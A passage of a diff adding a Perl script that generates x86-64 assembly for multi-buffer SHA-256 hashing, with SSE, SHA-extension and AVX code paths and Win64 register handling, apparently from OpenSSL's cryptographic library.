+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+# void sha256_multi_block (
+#     struct {	unsigned int A[8];
+#		unsigned int B[8];
+#		unsigned int C[8];
+#		unsigned int D[8];
+#		unsigned int E[8];
+#		unsigned int F[8];
+#		unsigned int G[8];
+#		unsigned int H[8];	} *ctx,
+#     struct {	void *ptr; int blocks;	} inp[8],
+#     int num);		/* 1 or 2 */
+#
+$ctx="%rdi";	# 1st arg
+$inp="%rsi";	# 2nd arg
+$num="%edx";	# 3rd arg
+@ptr=map("%r$_",(8..11));
+$Tbl="%rbp";
+
+@V=($A,$B,$C,$D,$E,$F,$G,$H)=map("%xmm$_",(8..15));
+($t1,$t2,$t3,$axb,$bxc,$Xi,$Xn,$sigma)=map("%xmm$_",(0..7));
+
+$REG_SZ=16;
+
+sub Xi_off {
+my $off = shift;
+
+    $off %= 16; $off *= $REG_SZ;
+    $off<256 ? "$off-128(%rax)" : "$off-256-128(%rbx)";
+}
+
+sub ROUND_00_15 {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+
+$code.=<<___ if ($i<15);
+	movd		`4*$i`(@ptr[0]),$Xi
+	movd		`4*$i`(@ptr[1]),$t1
+	movd		`4*$i`(@ptr[2]),$t2
+	movd		`4*$i`(@ptr[3]),$t3
+	punpckldq	$t2,$Xi
+	punpckldq	$t3,$t1
+	punpckldq	$t1,$Xi
+___
+$code.=<<___ if ($i==15);
+	movd		`4*$i`(@ptr[0]),$Xi
+	 lea		`16*4`(@ptr[0]),@ptr[0]
+	movd		`4*$i`(@ptr[1]),$t1
+	 lea		`16*4`(@ptr[1]),@ptr[1]
+	movd		`4*$i`(@ptr[2]),$t2
+	 lea		`16*4`(@ptr[2]),@ptr[2]
+	movd		`4*$i`(@ptr[3]),$t3
+	 lea		`16*4`(@ptr[3]),@ptr[3]
+	punpckldq	$t2,$Xi
+	punpckldq	$t3,$t1
+	punpckldq	$t1,$Xi
+___
+$code.=<<___;
+	movdqa	$e,$sigma
+	`"pshufb	$Xn,$Xi"		if ($i<=15 && ($i&1)==0)`
+	movdqa	$e,$t3
+	`"pshufb	$Xn,$Xi"		if ($i<=15 && ($i&1)==1)`
+	psrld	\$6,$sigma
+	movdqa	$e,$t2
+	pslld	\$7,$t3
+	movdqa	$Xi,`&Xi_off($i)`
+	 paddd	$h,$Xi				# Xi+=h
+
+	psrld	\$11,$t2
+	pxor	$t3,$sigma
+	pslld	\$21-7,$t3
+	 paddd	`32*($i%8)-128`($Tbl),$Xi	# Xi+=K[round]
+	pxor	$t2,$sigma
+
+	psrld	\$25-11,$t2
+	 movdqa	$e,$t1
+	 `"prefetcht0	63(@ptr[0])"		if ($i==15)`
+	pxor	$t3,$sigma
+	 movdqa	$e,$axb				# borrow $axb
+	pslld	\$26-21,$t3
+	 pandn	$g,$t1
+	 pand	$f,$axb
+	pxor	$t2,$sigma
+
+	 `"prefetcht0	63(@ptr[1])"		if ($i==15)`
+	movdqa	$a,$t2
+	pxor	$t3,$sigma			# Sigma1(e)
+	movdqa	$a,$t3
+	psrld	\$2,$t2
+	paddd	$sigma,$Xi			# Xi+=Sigma1(e)
+	 pxor	$axb,$t1			# Ch(e,f,g)
+	 movdqa	$b,$axb
+	movdqa	$a,$sigma
+	pslld	\$10,$t3
+	 pxor	$a,$axb				# a^b, b^c in next round
+
+	 `"prefetcht0	63(@ptr[2])"		if ($i==15)`
+	psrld	\$13,$sigma
+	pxor	$t3,$t2
+	 paddd	$t1,$Xi				# Xi+=Ch(e,f,g)
+	pslld	\$19-10,$t3
+	 pand	$axb,$bxc
+	pxor	$sigma,$t2
+
+	 `"prefetcht0	63(@ptr[3])"		if ($i==15)`
+	psrld	\$22-13,$sigma
+	pxor	$t3,$t2
+	 movdqa	$b,$h
+	pslld	\$30-19,$t3
+	pxor	$t2,$sigma
+	 pxor	$bxc,$h				# h=Maj(a,b,c)=Ch(a^b,c,b)
+	 paddd	$Xi,$d				# d+=Xi
+	pxor	$t3,$sigma			# Sigma0(a)
+
+	paddd	$Xi,$h				# h+=Xi
+	paddd	$sigma,$h			# h+=Sigma0(a)
+___
+$code.=<<___ if (($i%8)==7);
+	lea	`32*8`($Tbl),$Tbl
+___
+	($axb,$bxc)=($bxc,$axb);
+}
+
+sub ROUND_16_XX {
+my $i=shift;
+
+$code.=<<___;
+	movdqa	`&Xi_off($i+1)`,$Xn
+	paddd	`&Xi_off($i+9)`,$Xi		# Xi+=X[i+9]
+
+	movdqa	$Xn,$sigma
+	movdqa	$Xn,$t2
+	psrld	\$3,$sigma
+	movdqa	$Xn,$t3
+
+	psrld	\$7,$t2
+	movdqa	`&Xi_off($i+14)`,$t1
+	pslld	\$14,$t3
+	pxor	$t2,$sigma
+	psrld	\$18-7,$t2
+	movdqa	$t1,$axb			# borrow $axb
+	pxor	$t3,$sigma
+	pslld	\$25-14,$t3
+	pxor	$t2,$sigma
+	psrld	\$10,$t1
+	movdqa	$axb,$t2
+
+	psrld	\$17,$axb
+	pxor	$t3,$sigma			# sigma0(X[i+1])
+	pslld	\$13,$t2
+	 paddd	$sigma,$Xi			# Xi+=sigma0(e)
+	pxor	$axb,$t1
+	psrld	\$19-17,$axb
+	pxor	$t2,$t1
+	pslld	\$15-13,$t2
+	pxor	$axb,$t1
+	pxor	$t2,$t1				# sigma0(X[i+14])
+	paddd	$t1,$Xi				# Xi+=sigma1(X[i+14])
+___
+	&ROUND_00_15($i,@_);
+	($Xi,$Xn)=($Xn,$Xi);
+}
+
+$code.=<<___;
+.text
+
+.extern	OPENSSL_ia32cap_P
+
+.globl	sha256_multi_block
+.type	sha256_multi_block,\@function,3
+.align	32
+sha256_multi_block:
+	mov	OPENSSL_ia32cap_P+4(%rip),%rcx
+	bt	\$61,%rcx			# check SHA bit
+	jc	_shaext_shortcut
+___
+$code.=<<___ if ($avx);
+	test	\$`1<<28`,%ecx
+	jnz	_avx_shortcut
+___
+$code.=<<___;
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,-0x78(%rax)
+	movaps	%xmm11,-0x68(%rax)
+	movaps	%xmm12,-0x58(%rax)
+	movaps	%xmm13,-0x48(%rax)
+	movaps	%xmm14,-0x38(%rax)
+	movaps	%xmm15,-0x28(%rax)
+___
+$code.=<<___;
+	sub	\$`$REG_SZ*18`, %rsp
+	and	\$-256,%rsp
+	mov	%rax,`$REG_SZ*17`(%rsp)		# original %rsp
+.Lbody:
+	lea	K256+128(%rip),$Tbl
+	lea	`$REG_SZ*16`(%rsp),%rbx
+	lea	0x80($ctx),$ctx			# size optimization
+
+.Loop_grande:
+	mov	$num,`$REG_SZ*17+8`(%rsp)	# original $num
+	xor	$num,$num
+___
+for($i=0;$i<4;$i++) {
+    $code.=<<___;
+	mov	`16*$i+0`($inp),@ptr[$i]	# input pointer
+	mov	`16*$i+8`($inp),%ecx		# number of blocks
+	cmp	$num,%ecx
+	cmovg	%ecx,$num			# find maximum
+	test	%ecx,%ecx
+	mov	%ecx,`4*$i`(%rbx)		# initialize counters
+	cmovle	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Ldone
+
+	movdqu	0x00-0x80($ctx),$A		# load context
+	 lea	128(%rsp),%rax
+	movdqu	0x20-0x80($ctx),$B
+	movdqu	0x40-0x80($ctx),$C
+	movdqu	0x60-0x80($ctx),$D
+	movdqu	0x80-0x80($ctx),$E
+	movdqu	0xa0-0x80($ctx),$F
+	movdqu	0xc0-0x80($ctx),$G
+	movdqu	0xe0-0x80($ctx),$H
+	movdqu	.Lpbswap(%rip),$Xn
+	jmp	.Loop
+
+.align	32
+.Loop:
+	movdqa	$C,$bxc
+	pxor	$B,$bxc				# magic seed
+___
+for($i=0;$i<16;$i++)	{ &ROUND_00_15($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	movdqu	`&Xi_off($i)`,$Xi
+	mov	\$3,%ecx
+	jmp	.Loop_16_xx
+.align	32
+.Loop_16_xx:
+___
+for(;$i<32;$i++)	{ &ROUND_16_XX($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	dec	%ecx
+	jnz	.Loop_16_xx
+
+	mov	\$1,%ecx
+	lea	K256+128(%rip),$Tbl
+
+	movdqa	(%rbx),$sigma			# pull counters
+	cmp	4*0(%rbx),%ecx			# examine counters
+	pxor	$t1,$t1
+	cmovge	$Tbl,@ptr[0]			# cancel input
+	cmp	4*1(%rbx),%ecx
+	movdqa	$sigma,$Xn
+	cmovge	$Tbl,@ptr[1]
+	cmp	4*2(%rbx),%ecx
+	pcmpgtd	$t1,$Xn				# mask value
+	cmovge	$Tbl,@ptr[2]
+	cmp	4*3(%rbx),%ecx
+	paddd	$Xn,$sigma			# counters--
+	cmovge	$Tbl,@ptr[3]
+
+	movdqu	0x00-0x80($ctx),$t1
+	pand	$Xn,$A
+	movdqu	0x20-0x80($ctx),$t2
+	pand	$Xn,$B
+	movdqu	0x40-0x80($ctx),$t3
+	pand	$Xn,$C
+	movdqu	0x60-0x80($ctx),$Xi
+	pand	$Xn,$D
+	paddd	$t1,$A
+	movdqu	0x80-0x80($ctx),$t1
+	pand	$Xn,$E
+	paddd	$t2,$B
+	movdqu	0xa0-0x80($ctx),$t2
+	pand	$Xn,$F
+	paddd	$t3,$C
+	movdqu	0xc0-0x80($ctx),$t3
+	pand	$Xn,$G
+	paddd	$Xi,$D
+	movdqu	0xe0-0x80($ctx),$Xi
+	pand	$Xn,$H
+	paddd	$t1,$E
+	paddd	$t2,$F
+	movdqu	$A,0x00-0x80($ctx)
+	paddd	$t3,$G
+	movdqu	$B,0x20-0x80($ctx)
+	paddd	$Xi,$H
+	movdqu	$C,0x40-0x80($ctx)
+	movdqu	$D,0x60-0x80($ctx)
+	movdqu	$E,0x80-0x80($ctx)
+	movdqu	$F,0xa0-0x80($ctx)
+	movdqu	$G,0xc0-0x80($ctx)
+	movdqu	$H,0xe0-0x80($ctx)
+
+	movdqa	$sigma,(%rbx)			# save counters
+	movdqa	.Lpbswap(%rip),$Xn
+	dec	$num
+	jnz	.Loop
+
+	mov	`$REG_SZ*17+8`(%rsp),$num
+	lea	$REG_SZ($ctx),$ctx
+	lea	`16*$REG_SZ/4`($inp),$inp
+	dec	$num
+	jnz	.Loop_grande
+
+.Ldone:
+	mov	`$REG_SZ*17`(%rsp),%rax		# orignal %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	-0xb8(%rax),%xmm6
+	movaps	-0xa8(%rax),%xmm7
+	movaps	-0x98(%rax),%xmm8
+	movaps	-0x88(%rax),%xmm9
+	movaps	-0x78(%rax),%xmm10
+	movaps	-0x68(%rax),%xmm11
+	movaps	-0x58(%rax),%xmm12
+	movaps	-0x48(%rax),%xmm13
+	movaps	-0x38(%rax),%xmm14
+	movaps	-0x28(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lepilogue:
+	ret
+.size	sha256_multi_block,.-sha256_multi_block
+___
+						{{{
+my ($Wi,$TMP0,$TMP1,$TMPx,$ABEF0,$CDGH0,$ABEF1,$CDGH1)=map("%xmm$_",(0..3,12..15));
+my @MSG0=map("%xmm$_",(4..7));
+my @MSG1=map("%xmm$_",(8..11));
+
+$code.=<<___;
+.type	sha256_multi_block_shaext,\@function,3
+.align	32
+sha256_multi_block_shaext:
+_shaext_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,-0x78(%rax)
+	movaps	%xmm11,-0x68(%rax)
+	movaps	%xmm12,-0x58(%rax)
+	movaps	%xmm13,-0x48(%rax)
+	movaps	%xmm14,-0x38(%rax)
+	movaps	%xmm15,-0x28(%rax)
+___
+$code.=<<___;
+	sub	\$`$REG_SZ*18`,%rsp
+	shl	\$1,$num			# we process pair at a time
+	and	\$-256,%rsp
+	lea	0x80($ctx),$ctx			# size optimization
+	mov	%rax,`$REG_SZ*17`(%rsp)		# original %rsp
+.Lbody_shaext:
+	lea	`$REG_SZ*16`(%rsp),%rbx
+	lea	K256_shaext+0x80(%rip),$Tbl
+
+.Loop_grande_shaext:
+	mov	$num,`$REG_SZ*17+8`(%rsp)	# orignal $num
+	xor	$num,$num
+___
+for($i=0;$i<2;$i++) {
+    $code.=<<___;
+	mov	`16*$i+0`($inp),@ptr[$i]	# input pointer
+	mov	`16*$i+8`($inp),%ecx		# number of blocks
+	cmp	$num,%ecx
+	cmovg	%ecx,$num			# find maximum
+	test	%ecx,%ecx
+	mov	%ecx,`4*$i`(%rbx)		# initialize counters
+	cmovle	%rsp,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Ldone_shaext
+
+	movq		0x00-0x80($ctx),$ABEF0		# A1.A0
+	movq		0x20-0x80($ctx),@MSG0[0]	# B1.B0
+	movq		0x40-0x80($ctx),$CDGH0		# C1.C0
+	movq		0x60-0x80($ctx),@MSG0[1]	# D1.D0
+	movq		0x80-0x80($ctx),@MSG1[0]	# E1.E0
+	movq		0xa0-0x80($ctx),@MSG1[1]	# F1.F0
+	movq		0xc0-0x80($ctx),@MSG1[2]	# G1.G0
+	movq		0xe0-0x80($ctx),@MSG1[3]	# H1.H0
+
+	punpckldq	@MSG0[0],$ABEF0			# B1.A1.B0.A0
+	punpckldq	@MSG0[1],$CDGH0			# D1.C1.D0.C0
+	punpckldq	@MSG1[1],@MSG1[0]		# F1.E1.F0.E0
+	punpckldq	@MSG1[3],@MSG1[2]		# H1.G1.H0.G0
+	movdqa		K256_shaext-0x10(%rip),$TMPx	# byte swap
+
+	movdqa		$ABEF0,$ABEF1
+	movdqa		$CDGH0,$CDGH1
+	punpcklqdq	@MSG1[0],$ABEF0			# F0.E0.B0.A0
+	punpcklqdq	@MSG1[2],$CDGH0			# H0.G0.D0.C0
+	punpckhqdq	@MSG1[0],$ABEF1			# F1.E1.B1.A1
+	punpckhqdq	@MSG1[2],$CDGH1			# H1.G1.D1.C1
+
+	pshufd		\$0b00011011,$ABEF0,$ABEF0
+	pshufd		\$0b00011011,$CDGH0,$CDGH0
+	pshufd		\$0b00011011,$ABEF1,$ABEF1
+	pshufd		\$0b00011011,$CDGH1,$CDGH1
+	jmp		.Loop_shaext
+
+.align	32
+.Loop_shaext:
+	movdqu		0x00(@ptr[0]),@MSG0[0]
+	 movdqu		0x00(@ptr[1]),@MSG1[0]
+	movdqu		0x10(@ptr[0]),@MSG0[1]
+	 movdqu		0x10(@ptr[1]),@MSG1[1]
+	movdqu		0x20(@ptr[0]),@MSG0[2]
+	pshufb		$TMPx,@MSG0[0]
+	 movdqu		0x20(@ptr[1]),@MSG1[2]
+	 pshufb		$TMPx,@MSG1[0]
+	movdqu		0x30(@ptr[0]),@MSG0[3]
+	lea		0x40(@ptr[0]),@ptr[0]
+	 movdqu		0x30(@ptr[1]),@MSG1[3]
+	 lea		0x40(@ptr[1]),@ptr[1]
+
+	movdqa		0*16-0x80($Tbl),$Wi
+	pshufb		$TMPx,@MSG0[1]
+	paddd		@MSG0[0],$Wi
+	pxor		$ABEF0,@MSG0[0]		# black magic
+	movdqa		$Wi,$TMP0
+	 movdqa		0*16-0x80($Tbl),$TMP1
+	 pshufb		$TMPx,@MSG1[1]
+	 paddd		@MSG1[0],$TMP1
+	movdqa		$CDGH0,0x50(%rsp)	# offload
+	sha256rnds2	$ABEF0,$CDGH0		# 0-3
+	 pxor		$ABEF1,@MSG1[0]		# black magic
+	 movdqa		$TMP1,$Wi
+	 movdqa		$CDGH1,0x70(%rsp)
+	 sha256rnds2	$ABEF1,$CDGH1		# 0-3
+	pshufd		\$0x0e,$TMP0,$Wi
+	pxor		$ABEF0,@MSG0[0]		# black magic
+	movdqa		$ABEF0,0x40(%rsp)	# offload
+	sha256rnds2	$CDGH0,$ABEF0
+	 pshufd		\$0x0e,$TMP1,$Wi
+	 pxor		$ABEF1,@MSG1[0]		# black magic
+	 movdqa		$ABEF1,0x60(%rsp)
+	movdqa		1*16-0x80($Tbl),$TMP0
+	paddd		@MSG0[1],$TMP0
+	pshufb		$TMPx,@MSG0[2]
+	 sha256rnds2	$CDGH1,$ABEF1
+
+	movdqa		$TMP0,$Wi
+	 movdqa		1*16-0x80($Tbl),$TMP1
+	 paddd		@MSG1[1],$TMP1
+	sha256rnds2	$ABEF0,$CDGH0		# 4-7
+	 movdqa		$TMP1,$Wi
+	prefetcht0	127(@ptr[0])
+	pshufb		$TMPx,@MSG0[3]
+	 pshufb		$TMPx,@MSG1[2]
+	 prefetcht0	127(@ptr[1])
+	 sha256rnds2	$ABEF1,$CDGH1		# 4-7
+	pshufd		\$0x0e,$TMP0,$Wi
+	 pshufb		$TMPx,@MSG1[3]
+	sha256msg1	@MSG0[1],@MSG0[0]
+	sha256rnds2	$CDGH0,$ABEF0
+	 pshufd		\$0x0e,$TMP1,$Wi
+	movdqa		2*16-0x80($Tbl),$TMP0
+	paddd		@MSG0[2],$TMP0
+	 sha256rnds2	$CDGH1,$ABEF1
+
+	movdqa		$TMP0,$Wi
+	 movdqa		2*16-0x80($Tbl),$TMP1
+	 paddd		@MSG1[2],$TMP1
+	sha256rnds2	$ABEF0,$CDGH0		# 8-11
+	 sha256msg1	@MSG1[1],@MSG1[0]
+	 movdqa		$TMP1,$Wi
+	movdqa		@MSG0[3],$TMPx
+	 sha256rnds2	$ABEF1,$CDGH1		# 8-11
+	pshufd		\$0x0e,$TMP0,$Wi
+	palignr		\$4,@MSG0[2],$TMPx
+	paddd		$TMPx,@MSG0[0]
+	 movdqa		@MSG1[3],$TMPx
+	 palignr	\$4,@MSG1[2],$TMPx
+	sha256msg1	@MSG0[2],@MSG0[1]
+	sha256rnds2	$CDGH0,$ABEF0
+	 pshufd		\$0x0e,$TMP1,$Wi
+	movdqa		3*16-0x80($Tbl),$TMP0
+	paddd		@MSG0[3],$TMP0
+	 sha256rnds2	$CDGH1,$ABEF1
+	 sha256msg1	@MSG1[2],@MSG1[1]
+
+	movdqa		$TMP0,$Wi
+	 movdqa		3*16-0x80($Tbl),$TMP1
+	 paddd		$TMPx,@MSG1[0]
+	 paddd		@MSG1[3],$TMP1
+	sha256msg2	@MSG0[3],@MSG0[0]
+	sha256rnds2	$ABEF0,$CDGH0		# 12-15
+	 movdqa		$TMP1,$Wi
+	movdqa		@MSG0[0],$TMPx
+	palignr		\$4,@MSG0[3],$TMPx
+	 sha256rnds2	$ABEF1,$CDGH1		# 12-15
+	 sha256msg2	@MSG1[3],@MSG1[0]
+	pshufd		\$0x0e,$TMP0,$Wi
+	paddd		$TMPx,@MSG0[1]
+	 movdqa		@MSG1[0],$TMPx
+	 palignr	\$4,@MSG1[3],$TMPx
+	sha256msg1	@MSG0[3],@MSG0[2]
+	sha256rnds2	$CDGH0,$ABEF0
+	 pshufd		\$0x0e,$TMP1,$Wi
+	movdqa		4*16-0x80($Tbl),$TMP0
+	paddd		@MSG0[0],$TMP0
+	 sha256rnds2	$CDGH1,$ABEF1
+	 sha256msg1	@MSG1[3],@MSG1[2]
+___
+for($i=4;$i<16-3;$i++) {
+$code.=<<___;
+	movdqa		$TMP0,$Wi
+	 movdqa		$i*16-0x80($Tbl),$TMP1
+	 paddd		$TMPx,@MSG1[1]
+	 paddd		@MSG1[0],$TMP1
+	sha256msg2	@MSG0[0],@MSG0[1]
+	sha256rnds2	$ABEF0,$CDGH0		# 16-19...
+	 movdqa		$TMP1,$Wi
+	movdqa		@MSG0[1],$TMPx
+	palignr		\$4,@MSG0[0],$TMPx
+	 sha256rnds2	$ABEF1,$CDGH1		# 16-19...
+	 sha256msg2	@MSG1[0],@MSG1[1]
+	pshufd		\$0x0e,$TMP0,$Wi
+	paddd		$TMPx,@MSG0[2]
+	 movdqa		@MSG1[1],$TMPx
+	 palignr	\$4,@MSG1[0],$TMPx
+	sha256msg1	@MSG0[0],@MSG0[3]
+	sha256rnds2	$CDGH0,$ABEF0
+	 pshufd		\$0x0e,$TMP1,$Wi
+	movdqa		`($i+1)*16`-0x80($Tbl),$TMP0
+	paddd		@MSG0[1],$TMP0
+	 sha256rnds2	$CDGH1,$ABEF1
+	 sha256msg1	@MSG1[0],@MSG1[3]
+___
+	push(@MSG0,shift(@MSG0));	push(@MSG1,shift(@MSG1));
+}
+$code.=<<___;
+	movdqa		$TMP0,$Wi
+	 movdqa		13*16-0x80($Tbl),$TMP1
+	 paddd		$TMPx,@MSG1[1]
+	 paddd		@MSG1[0],$TMP1
+	sha256msg2	@MSG0[0],@MSG0[1]
+	sha256rnds2	$ABEF0,$CDGH0		# 52-55
+	 movdqa		$TMP1,$Wi
+	movdqa		@MSG0[1],$TMPx
+	palignr		\$4,@MSG0[0],$TMPx
+	 sha256rnds2	$ABEF1,$CDGH1		# 52-55
+	 sha256msg2	@MSG1[0],@MSG1[1]
+	pshufd		\$0x0e,$TMP0,$Wi
+	paddd		$TMPx,@MSG0[2]
+	 movdqa		@MSG1[1],$TMPx
+	 palignr	\$4,@MSG1[0],$TMPx
+	nop
+	sha256rnds2	$CDGH0,$ABEF0
+	 pshufd		\$0x0e,$TMP1,$Wi
+	movdqa		14*16-0x80($Tbl),$TMP0
+	paddd		@MSG0[1],$TMP0
+	 sha256rnds2	$CDGH1,$ABEF1
+
+	movdqa		$TMP0,$Wi
+	 movdqa		14*16-0x80($Tbl),$TMP1
+	 paddd		$TMPx,@MSG1[2]
+	 paddd		@MSG1[1],$TMP1
+	sha256msg2	@MSG0[1],@MSG0[2]
+	nop
+	sha256rnds2	$ABEF0,$CDGH0		# 56-59
+	 movdqa		$TMP1,$Wi
+	  mov		\$1,%ecx
+	  pxor		@MSG0[1],@MSG0[1]	# zero
+	 sha256rnds2	$ABEF1,$CDGH1		# 56-59
+	 sha256msg2	@MSG1[1],@MSG1[2]
+	pshufd		\$0x0e,$TMP0,$Wi
+	movdqa		15*16-0x80($Tbl),$TMP0
+	paddd		@MSG0[2],$TMP0
+	  movq		(%rbx),@MSG0[2]		# pull counters
+	  nop
+	sha256rnds2	$CDGH0,$ABEF0
+	 pshufd		\$0x0e,$TMP1,$Wi
+	 movdqa		15*16-0x80($Tbl),$TMP1
+	 paddd		@MSG1[2],$TMP1
+	 sha256rnds2	$CDGH1,$ABEF1
+
+	movdqa		$TMP0,$Wi
+	  cmp		4*0(%rbx),%ecx		# examine counters
+	  cmovge	%rsp,@ptr[0]		# cancel input
+	  cmp		4*1(%rbx),%ecx
+	  cmovge	%rsp,@ptr[1]
+	  pshufd	\$0x00,@MSG0[2],@MSG1[0]
+	sha256rnds2	$ABEF0,$CDGH0		# 60-63
+	 movdqa		$TMP1,$Wi
+	  pshufd	\$0x55,@MSG0[2],@MSG1[1]
+	  movdqa	@MSG0[2],@MSG1[2]
+	 sha256rnds2	$ABEF1,$CDGH1		# 60-63
+	pshufd		\$0x0e,$TMP0,$Wi
+	  pcmpgtd	@MSG0[1],@MSG1[0]
+	  pcmpgtd	@MSG0[1],@MSG1[1]
+	sha256rnds2	$CDGH0,$ABEF0
+	 pshufd		\$0x0e,$TMP1,$Wi
+	  pcmpgtd	@MSG0[1],@MSG1[2]	# counter mask
+	  movdqa	K256_shaext-0x10(%rip),$TMPx
+	 sha256rnds2	$CDGH1,$ABEF1
+
+	pand		@MSG1[0],$CDGH0
+	 pand		@MSG1[1],$CDGH1
+	pand		@MSG1[0],$ABEF0
+	 pand		@MSG1[1],$ABEF1
+	paddd		@MSG0[2],@MSG1[2]	# counters--
+
+	paddd		0x50(%rsp),$CDGH0
+	 paddd		0x70(%rsp),$CDGH1
+	paddd		0x40(%rsp),$ABEF0
+	 paddd		0x60(%rsp),$ABEF1
+
+	movq		@MSG1[2],(%rbx)		# save counters
+	dec		$num
+	jnz		.Loop_shaext
+
+	mov		`$REG_SZ*17+8`(%rsp),$num
+
+	pshufd		\$0b00011011,$ABEF0,$ABEF0
+	pshufd		\$0b00011011,$CDGH0,$CDGH0
+	pshufd		\$0b00011011,$ABEF1,$ABEF1
+	pshufd		\$0b00011011,$CDGH1,$CDGH1
+
+	movdqa		$ABEF0,@MSG0[0]
+	movdqa		$CDGH0,@MSG0[1]
+	punpckldq	$ABEF1,$ABEF0			# B1.B0.A1.A0
+	punpckhdq	$ABEF1,@MSG0[0]			# F1.F0.E1.E0
+	punpckldq	$CDGH1,$CDGH0			# D1.D0.C1.C0
+	punpckhdq	$CDGH1,@MSG0[1]			# H1.H0.G1.G0
+
+	movq		$ABEF0,0x00-0x80($ctx)		# A1.A0
+	psrldq		\$8,$ABEF0
+	movq		@MSG0[0],0x80-0x80($ctx)	# E1.E0
+	psrldq		\$8,@MSG0[0]
+	movq		$ABEF0,0x20-0x80($ctx)		# B1.B0
+	movq		@MSG0[0],0xa0-0x80($ctx)	# F1.F0
+
+	movq		$CDGH0,0x40-0x80($ctx)		# C1.C0
+	psrldq		\$8,$CDGH0
+	movq		@MSG0[1],0xc0-0x80($ctx)	# G1.G0
+	psrldq		\$8,@MSG0[1]
+	movq		$CDGH0,0x60-0x80($ctx)		# D1.D0
+	movq		@MSG0[1],0xe0-0x80($ctx)	# H1.H0
+
+	lea	`$REG_SZ/2`($ctx),$ctx
+	lea	`16*2`($inp),$inp
+	dec	$num
+	jnz	.Loop_grande_shaext
+
+.Ldone_shaext:
+	#mov	`$REG_SZ*17`(%rsp),%rax		# original %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	-0xb8(%rax),%xmm6
+	movaps	-0xa8(%rax),%xmm7
+	movaps	-0x98(%rax),%xmm8
+	movaps	-0x88(%rax),%xmm9
+	movaps	-0x78(%rax),%xmm10
+	movaps	-0x68(%rax),%xmm11
+	movaps	-0x58(%rax),%xmm12
+	movaps	-0x48(%rax),%xmm13
+	movaps	-0x38(%rax),%xmm14
+	movaps	-0x28(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lepilogue_shaext:
+	ret
+.size	sha256_multi_block_shaext,.-sha256_multi_block_shaext
+___
+						}}}
+						if ($avx) {{{
+sub ROUND_00_15_avx {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+
+$code.=<<___ if ($i<15 && $REG_SZ==16);
+	vmovd		`4*$i`(@ptr[0]),$Xi
+	vmovd		`4*$i`(@ptr[1]),$t1
+	vpinsrd		\$1,`4*$i`(@ptr[2]),$Xi,$Xi
+	vpinsrd		\$1,`4*$i`(@ptr[3]),$t1,$t1
+	vpunpckldq	$t1,$Xi,$Xi
+	vpshufb		$Xn,$Xi,$Xi
+___
+$code.=<<___ if ($i==15 && $REG_SZ==16);
+	vmovd		`4*$i`(@ptr[0]),$Xi
+	 lea		`16*4`(@ptr[0]),@ptr[0]
+	vmovd		`4*$i`(@ptr[1]),$t1
+	 lea		`16*4`(@ptr[1]),@ptr[1]
+	vpinsrd		\$1,`4*$i`(@ptr[2]),$Xi,$Xi
+	 lea		`16*4`(@ptr[2]),@ptr[2]
+	vpinsrd		\$1,`4*$i`(@ptr[3]),$t1,$t1
+	 lea		`16*4`(@ptr[3]),@ptr[3]
+	vpunpckldq	$t1,$Xi,$Xi
+	vpshufb		$Xn,$Xi,$Xi
+___
+$code.=<<___ if ($i<15 && $REG_SZ==32);
+	vmovd		`4*$i`(@ptr[0]),$Xi
+	vmovd		`4*$i`(@ptr[4]),$t1
+	vmovd		`4*$i`(@ptr[1]),$t2
+	vmovd		`4*$i`(@ptr[5]),$t3
+	vpinsrd		\$1,`4*$i`(@ptr[2]),$Xi,$Xi
+	vpinsrd		\$1,`4*$i`(@ptr[6]),$t1,$t1
+	vpinsrd		\$1,`4*$i`(@ptr[3]),$t2,$t2
+	vpunpckldq	$t2,$Xi,$Xi
+	vpinsrd		\$1,`4*$i`(@ptr[7]),$t3,$t3
+	vpunpckldq	$t3,$t1,$t1
+	vinserti128	$t1,$Xi,$Xi
+	vpshufb		$Xn,$Xi,$Xi
+___
+$code.=<<___ if ($i==15 && $REG_SZ==32);
+	vmovd		`4*$i`(@ptr[0]),$Xi
+	 lea		`16*4`(@ptr[0]),@ptr[0]
+	vmovd		`4*$i`(@ptr[4]),$t1
+	 lea		`16*4`(@ptr[4]),@ptr[4]
+	vmovd		`4*$i`(@ptr[1]),$t2
+	 lea		`16*4`(@ptr[1]),@ptr[1]
+	vmovd		`4*$i`(@ptr[5]),$t3
+	 lea		`16*4`(@ptr[5]),@ptr[5]
+	vpinsrd		\$1,`4*$i`(@ptr[2]),$Xi,$Xi
+	 lea		`16*4`(@ptr[2]),@ptr[2]
+	vpinsrd		\$1,`4*$i`(@ptr[6]),$t1,$t1
+	 lea		`16*4`(@ptr[6]),@ptr[6]
+	vpinsrd		\$1,`4*$i`(@ptr[3]),$t2,$t2
+	 lea		`16*4`(@ptr[3]),@ptr[3]
+	vpunpckldq	$t2,$Xi,$Xi
+	vpinsrd		\$1,`4*$i`(@ptr[7]),$t3,$t3
+	 lea		`16*4`(@ptr[7]),@ptr[7]
